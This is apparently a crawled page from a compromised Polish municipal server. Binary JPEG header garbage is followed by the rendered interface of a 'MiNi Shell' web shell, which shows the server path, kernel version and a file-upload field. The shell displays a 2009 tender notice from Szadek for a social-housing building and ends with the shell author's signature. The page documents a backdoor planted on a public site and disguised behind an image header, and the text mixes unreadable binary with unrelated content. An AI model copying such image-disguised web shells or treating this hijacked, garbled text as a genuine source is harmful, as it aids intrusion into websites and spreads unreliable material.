JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090709/108183-N-2009.html

<p class="kh_header"><b>Szadek: Budowa wielorodzinnego budynku mieszkalnego z lokalami socjalnymi,  wraz z infrastrukturą towarzyszącą: przyłącza wod. - kan., parking i zjazd publiczny na drogę, budynki gospodarcze i śmietniki oraz instalacje elektryczne zewnętrzne,  na działce ewid. gruntu 126 w Szadku, ul. Grabowiny.</b><br>
<b>Numer ogłoszenia: 108183 - 2009; data zamieszczenia: 09.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy i Miasta w Szadku , ul. Warszawska 3, 98-240 Szadek, woj. łódzkie, tel. 043 8215004 8216810, faks 043 8215773.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> UrzadGiM@poczta.onet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa wielorodzinnego budynku mieszkalnego z lokalami socjalnymi,  wraz z infrastrukturą towarzyszącą: przyłącza wod. - kan., parking i zjazd publiczny na drogę, budynki gospodarcze i śmietniki oraz instalacje elektryczne zewnętrzne,  na działce ewid. gruntu 126 w Szadku, ul. Grabowiny..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa wielorodzinnego budynku mieszkalnego z lokalami socjalnymi,  wraz z infrastrukturą towarzyszącą: przyłącza wod. - kan., parking i zjazd publiczny na drogę, budynki gospodarcze i śmietniki oraz instalacje elektryczne zewnętrzne,  na działce ewid. gruntu 126 w Szadku, ul. Grabowiny.

Projektowany wielorodzinny budynek mieszkalny dwukondygnacyjny bez podpiwniczenia bez poddasza użytkowego przykryty stropodachem. Budynek będzie posiadał 20 lokali mieszkalnych, po 10 na jednej kondygnacji, w tym dwa lokale na parterze przystosowane dla osób niepełnosprawnych. Budynek będzie ogrzewany przez indywidualne piece węglowe zainstalowane w każdym lokalu. Całkowita powierzchnia użytkowa budynku z klatką schodową 695,2m2. Ściany zewnętrzne dwuwarstwowe, pustak ceramiczny docieplony styropianem, wykończone tynkiem na siatce. 
Pięć budynków gospodarczych, powierzchnia zabudowy jednego budynku to 23,8m2. W każdym budynku mieszczą się 4 pomieszczenia gospodarcze. Budynki murowane z cegły sylikatowej grubości 25cm. 
Przyłącze wodociągowe długości 33mb z rur PE. Przyłącze kanalizacyjne Dz 200mm z PCV-U długości 81,5mb oraz Dz 160mm PCV-U długości 6mb.
Źródłami ciepła będą lokalne piece grzewcze zlokalizowane w pomieszczeniach kuchni. Wszystkie lokale będą zwodociągowane i skanalizowane, łazienki wyposażone w kabinę prysznicową, umywalkę oraz ustęp, a kuchnie w zlewozmywaki.
Projektuje się zjazd publiczny o szerokości jezdni zjazdu 5,60mb, długość przepustu pod zjazdem - 12mb.
Projektuje się 22 miejsca parkingowe, w tym 2 dla osób niepełnosprawnych wraz z placem manewrowym i drogami wewnętrznymi. Nawierzchnia zjazdu i placu parkingowego - kostka betonowa wibroprasowana na podbudowie. Projektowane oświetlenie parkingów oraz dróg dojazdowych na terenie. 
Kody CPV
45211340-4 - prace budowlane dotyczące budowy budynków wielorodzinnych
45211350-7 - prace budowlane dotyczące budowy budynków wielofunkcyjnych w ramach budowy budynków gospodarczych i budowy śmietnika
45231000-8 - roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków
45331100-7 - instalowanie centralnego ogrzewania
45331110-0 - instalowanie kotłów
45332000-3 - roboty instalacyjne wodne i kanalizacyjne
45332200-5 - roboty instalacyjne hydrauliczne
45332300-6 - roboty instalacyjne kanalizacyjne
45311000-0 - okablowanie elektryczne oraz instalacje elektryczne
45316100-6 - instalowanie urządzeń oświetlenia ulicznego
45315600-4 - instalacje niskiego napięcia, 45233222-1 roboty budowlane w zakresie układania chodników i asfaltowania
Dokładny opis zamówienia określa: dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót, przedmiary, kosztorysy nakładcze.

Wykonawca dostarczy także inwentaryzację geodezyjną powykonawczą.
Dokumentacja projektowa obiektów stanowi Załącznik nr 7 do SIWZ, specyfikacja techniczna wykonania i odbioru robót budowlanych stanowi  Załącznik nr 8 do SIWZ,  przedmiary robót (kosztorysy nakładcze) stanowią Załącznik nr 2 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 45.21.13.50-7, 45.23.10.00-8, 45.33.11.00-7, 45.33.11.10-0, 45.33.20.00-3, 45.33.22.00-5, 45.33.23.00-6, 45.31.10.00-0, 45.31.61.00-6, 45.31.56.00-4, 45.23.32.22-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia od wykonawców wadium. Wadium musi być wniesione przed upływem terminu składania ofert.
Ustala się kwotę wadium w wysokości 40.000zł
Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy  oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6B ust. 5 pkt 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 z późn. zm.).
Wadium wniesione w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego: Bank Spółdzielczy w Szadku  24 9269 0004 0000 0648 2000 0040
Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
Zamawiający dokona zwrotu wadium  niezwłocznie jeżeli zajdą okoliczności określone w art. 46 ust. 1 i 2 ustawy.
Zamawiający zatrzymuje wadium w przypadku wystąpienia okoliczności określonych w art. 46 ust. 4a i 5 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:
- złożą pisemne oświadczenie, iż spełniają warunki zawarte w art. 22 ust. 1 pkt 1-4 Ustawy Prawo Zamówień Publicznych z dnia 29 stycznia 2004 r. (Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm. ) oraz nie podlegają wykluczeniu z ubiegania się o udzielenie postępowania na podstawie art. 24 ust. 1 i 2 Ustawy Prawo Zamówień Publicznych z dnia 29 stycznia 2004 r. (Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm. ).,
- prowadzą działalność gospodarczą na podstawie wpisu do ewidencji działalności gospodarczej lub krajowego rejestru sądowego w zakresie określonym zamówieniem,
- nie zalegają z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał prawem przewidziane zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania  decyzji właściwego organu,
- wykonali w okresie ostatnich 5  lat przed dniem wszczęcia postępowania o udzielenie zamówienia  tj. dniem 08.07.2009 r., a jeżeli okres prowadzenia działalności jest krótszy -  w tym  okresie, minimum 1 robotę budowlaną odpowiadającą swoim rodzajem i wartością robocie budowlanej stanowiącej przedmiot zamówienia tj.  polegającą na wykonaniu budynku kubaturowego o powierzchni użytkowej budynku minimum 700m2., z podaniem jej wartości, przedmiotu oraz daty i miejsca wykonania. Do wykazu wykonawca musi dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie,
- dysponują osobą/osobami posiadającą/posiadającymi uprawnienia do kierowania robotami budowlanymi w specjalnościach zgodnych z zakresem roboty określonej w specyfikacji (branże budowlana, sanitarna i elektryczna). Wykonawca jest zobowiązany dołączyć do oferty kserokopie, potwierdzone za zgodność z oryginałem, takich uprawnień oraz zaświadczenie, wydane przez właściwą izbę samorządu zawodowego, potwierdzające wpis danej osoby na listę członków właściwej izby,
- w ostatnich 3 latach, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, zatrudniali nie mniej niż 30 pracowników, w każdym roku z 3 lat. Wykonawca zobowiązany jest dołączyć stosowną informację na temat przeciętnej liczby zatrudnionych pracowników w okresie ostatnich 3 lat,
- są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzenia działalności gospodarczej,
- posiadają środki finansowe lub zdolność kredytową na kwotę minimum 400.000 złotych..


Sposób dokonywania oceny spełnienia w/w warunków.
W oparciu o złożone oświadczenia, dokumenty i zawarte w nich informacje stosując system oceny: spełnia - nie spełnia, tzn.:
a) wykonawca złożył wymagane dokumenty potwierdzające spełnienie warunku udziału w postępowaniu lub oświadczenia - spełnia warunek udziału w postępowaniu,
b) wykonawca nie złożył wymaganych dokumentów potwierdzających spełnienie warunku udziału w postępowaniu lub oświadczenie - nie spełnia warunku udziału w postępowaniu.
Z treści załączonych dokumentów i oświadczeń musi  wynikać jednoznacznie, iż Wykonawca spełnia w/w warunki.
Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli  oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo uzupełnienia konieczne było unieważnienie postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu:

a.	Oferta przetargowa (   Załącznik nr 1),
b.	Wypełnione kosztorysy ofertowe sporządzone na podstawie przedmiarów robót (kosztorysów nakładczych) będących załącznikiem do SIWZ  (Załącznik nr 2)
c.	Oświadczenie z  art. 22 i  art. 24 Ustawy Prawo Zamówień Publicznych z dnia 29 stycznia 2004 r. (Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm. ) (Załącznik nr 3)
d. aktualny odpis z właściwego rejestru sądowego albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert,
e. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego  oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiedni, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał prawem przewidziane zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania  decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
e.	wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat  przed dniem wszczęcia postępowania o udzielenie zamówienia tj. 08.07.2009r., a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających,  że roboty te zostały wykonane należycie (referencje, protokoły odbioru itp.).  (Załącznik  Nr 4) 
f.	dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania tych uprawnień tj. np. kserokopie uprawnień i przynależności do właściwej izby inżynierów budownictwa  kierownika  budowy  kierownika robót z uprawnieniami w specjalnościach:  budowa dróg, 
h. informacja na temat przeciętnej liczby zatrudnionych pracowników, w okresie ostatnich 3 lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie, jeżeli przedmiotem zamówienia są roboty budowlane lub usługi, (Załącznik nr 5) ,
i. polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności,
j. informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
k. harmonogram rzeczowo - finansowy załącznik nr 9 do SIWZ.

Wyżej wymienione wykazy, dokumenty  i oświadczenia powinny być złożone  w formie oryginału lub kserokopii poświadczonej za zgodność przez wykonawcę. Poświadczenie powinno być opatrzone pieczęcią i podpisem osoby upoważnionej, datą i napisem za zgodność z oryginałem, zgodne z oryginałem itp.. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę 
Wszelkie poprawki lub zmiany w tekście oferty muszą być parafowane i datowane własnoręcznie przez osobę podpisującą ofertę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szadek.bip.cc w zakładce dokumentacja przetargowa - specyfikacja istotnych warunków zamówienia.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta w Szadku, ul. Warszawska 3, 98- 240 Szadek, pok. 4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2009 godzina 10:00, miejsce: Urząd Gminy i Miasta w Szadku, ul. Warszawska 3, 98- 240 Szadek pok. 17.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com